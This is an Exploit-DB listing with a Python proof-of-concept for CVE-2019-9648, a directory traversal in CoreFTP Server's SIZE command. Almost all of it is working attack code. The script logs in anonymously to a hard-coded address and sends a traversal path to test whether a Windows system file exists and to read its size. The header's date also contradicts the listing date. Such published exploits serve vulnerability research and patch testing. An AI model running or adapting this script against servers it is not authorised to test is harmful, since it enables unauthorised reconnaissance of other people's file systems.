Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal

EDB-ID:

46535




Platform:

Windows

Date:

2019-03-13


# Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674  SIZE Directory Traversal
# Google Dork: N/A
# Date: 4/27/2019
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.coreftp.com
# Software Link: http://www.coreftp.com/server/index.html
# Version: Firmware: CoreFTP Server FTP / SFTP Server v2 - Build 674
# Tested on: Windows 7
# CVE : CVE-2019-9648


#!/usr/bin/python

import socket
import sys

########################################################
###########Set Variables For Script Here################

file_to_look_for = "nslookup.exe"
local_disk_drive = " C:"
path_traversal = "\..\..\..\..\..\Windows\System32\\"

########################################################
print ("""
         #####  #     # #######        #####    ###     #    #####         #####   #####  #        #####
         #     # #     # #             #     #  #   #   ##   #     #       #     # #     # #    #  #     #
         #       #     # #                   # #     # # #   #     #       #     # #       #    #  #     #
         #       #     # #####   #####  #####  #     #   #    ###### #####  ###### ######  #    #   #####
         #        #   #  #             #       #     #   #         #             # #     # ####### #     #
         #     #   # #   #             #        #   #    #   #     #       #     # #     #      #  #     #
          #####     #    #######       #######   ###   #####  #####         #####   #####       #   #####

          #######
          #       #    # #####  #       ####  # #####
          #        #  #  #    # #      #    # #   #
          #####     ##   #    # #      #    # #   #
          #         ##   #####  #      #    # #   #
          #        #  #  #      #      #    # #   #
          ####### #    # #      ######  ####  #   #

          #     #                                       ######         #     #    #
          #  #  # #####  # ##### ##### ###### #    #    #     # #   # ###    #   #  ###### #    # # #    #
          #  #  # #    # #   #     #   #      ##   #    #     #  # #   #     #  #   #      #    # # ##   #
          #  #  # #    # #   #     #   #####  # #  #    ######    #          ###    #####  #    # # # #  #
          #  #  # #####  #   #     #   #      #  # #    #     #   #    #     #  #   #      #    # # #  # #
          #  #  # #   #  #   #     #   #      #   ##    #     #   #   ###    #   #  #       #  #  # #   ##
           ## ##  #    # #   #     #   ###### #    #    ######    #    #     #    # ######   ##   # #    #

           ######
           #     #   ##   #    # #####    ##   #      #
           #     #  #  #  ##   # #    #  #  #  #      #
           ######  #    # # #  # #    # #    # #      #
           #   #   ###### #  # # #    # ###### #      #
           #    #  #    # #   ## #    # #    # #      #
           #     # #    # #    # #####  #    # ###### ######

           """)
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect(('192.168.0.4',21))

s.recv(1024)
s.send('USER anonymous\r\n')

s.recv(1024)
s.send('PASS anonymous\r\n')

s.recv(1024)
s.recv(1024)
s.send('SIZE' +local_disk_drive+path_traversal+file_to_look_for + '\r\n')
result = s.recv(2048)
trimmedoutput = result.strip()
splitoutput = trimmedoutput.split(' ')
realresult = unicode (trimmedoutput,'utf-8')
realresult2 = unicode (splitoutput[1],'utf-8')
isnum = realresult.isnumeric()
isnum2 = realresult2.isnumeric()
if isnum2:
    print "The file " + file_to_look_for + " exist on the remote server. Here is the filesize:" + splitoutput[1]
else:
    print "The file " + file_to_look_for + " does not exist on the remote server or one of the variables declared is incorrect."

s.send('QUIT\r\n')

s.close